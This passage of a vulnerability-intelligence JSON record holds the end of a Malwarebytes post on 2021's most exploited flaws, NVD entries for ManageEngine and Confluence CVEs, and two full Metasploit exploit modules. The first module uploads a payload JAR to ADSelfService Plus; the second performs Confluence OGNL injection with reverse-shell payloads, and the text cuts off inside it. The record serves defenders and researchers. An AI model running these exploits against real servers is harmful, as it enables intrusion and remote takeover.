follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. 
Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the four CVEs, we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. 
Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. 
An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. 
When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these "requirements" move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": 
"https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T19:10:37", "description": "Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T17:15:00", "type": "cve", "title": "CVE-2021-40539", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-29T17:18:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus:6.0", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.8", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.0", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.4", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.5", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.2", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.7", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.3", 
"cpe:/a:zohocorp:manageengine_adselfservice_plus:4.5", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.0.6", "cpe:/a:zohocorp:manageengine_adselfservice_plus:6.1", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.1", "cpe:/a:zohocorp:manageengine_adselfservice_plus:5.6"], "id": "CVE-2021-40539", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5805:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5316:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5709:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5806:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4550:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5813:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5519:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4580:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5809:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5324:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5020:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.2:5201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.8:5801:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5305:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5022:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5607:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5318:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5320:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5107:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.3:5329:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5707:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.4:5400:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.6:5600:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.7:5702:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.0:6007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.1:5115:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5501:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.0:5000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5509:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:5.5:5502:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:59", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. 
This is related to the CewolfServlet and MDMLogUploaderServlet servlets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T17:15:00", "type": "cve", "title": "CVE-2020-10189", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-09T14:15:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10"], "id": "CVE-2020-10189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-10189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-30T15:23:04", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. 
The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T07:15:00", "type": "cve", "title": "CVE-2021-26084", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-30T13:29:00", "cpe": [], "id": "CVE-2021-26084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "metasploit": [{"lastseen": "2021-12-14T04:38:03", "description": "This module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-24T01:05:09", "type": "metasploit", "title": "ManageEngine ADSelfService Plus CVE-2021-40539", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T16:44:59", "id": "MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539/", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',\n 'Description' => %q{\n This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'Antoine Cervoise', 
# Independent analysis and RCE\n 'Wilfried B\u00e9card', # Independent analysis and RCE\n 'mr_me', # keytool classloading technique\n 'wvu' # Initial analysis and module\n ],\n 'References' => [\n ['CVE', '2021-40539'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],\n ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],\n ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],\n ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']\n ],\n 'DisclosureDate' => '2021-09-07',\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true if ADSelfService Plus is run as a service\n 'Targets' => [\n ['Java Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'vars_post' => {\n 'methodToCall' => 'previewMobLogo'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg})\n return CheckCode::Safe('Failed to bypass REST API authentication.')\n end\n\n CheckCode::Vulnerable('Successfully bypassed REST API authentication.')\n end\n\n def exploit\n upload_payload_jar\n execute_payload_jar\n end\n\n def upload_payload_jar\n print_status(\"Uploading payload JAR: #{jar_filename}\")\n\n jar = payload.encoded_jar\n jar.add_file(\"#{class_name}.class\", constructor_class) # 
Hack, tbh\n\n form = Rex::MIME::Message.new\n form.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"')\n form.add_part('yas', nil, nil, 'form-data; name=\"Save\"')\n form.add_part('smartcard', nil, nil, 'form-data; name=\"form\"')\n form.add_part('Add', nil, nil, 'form-data; name=\"operation\"')\n form.add_part(jar.pack, 'application/java-archive', 'binary',\n %(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\"))\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 404\n fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')\n end\n\n # C:\\ManageEngine\\ADSelfService Plus\\bin (working directory)\n register_file_for_cleanup(jar_filename)\n\n print_good('Successfully uploaded payload JAR')\n end\n\n def execute_payload_jar\n print_status('Executing payload JAR')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),\n 'vars_post' => {\n 'methodToCall' => 'openSSLTool',\n 'action' => 'generateCSR',\n # https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html\n 'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\"\n }\n )\n\n unless res&.code == 404\n fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')\n end\n\n print_good('Successfully executed payload JAR')\n end\n\n def jar_filename\n @jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:40:42", "description": "This module exploits an OGNL injection in Atlassian Confluence's WebWork component to 
execute commands as the Tomcat user.\n", "cvss3": {}, "published": "2021-10-14T21:58:04", "type": "metasploit", "title": "Atlassian Confluence WebWork OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-14T21:58:04", "id": "MSF:EXPLOIT/MULTI/HTTP/ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION/", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/atlassian_confluence_webwork_ognl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Module::Deprecated\n\n # Added Windows support\n moved_from 'exploit/linux/http/atlassian_confluence_webwork_ognl_injection'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 
'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL 
injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n when :psh\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n #{target_shell},\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\n def target_shell\n target['Platform'] == 'win' ? 
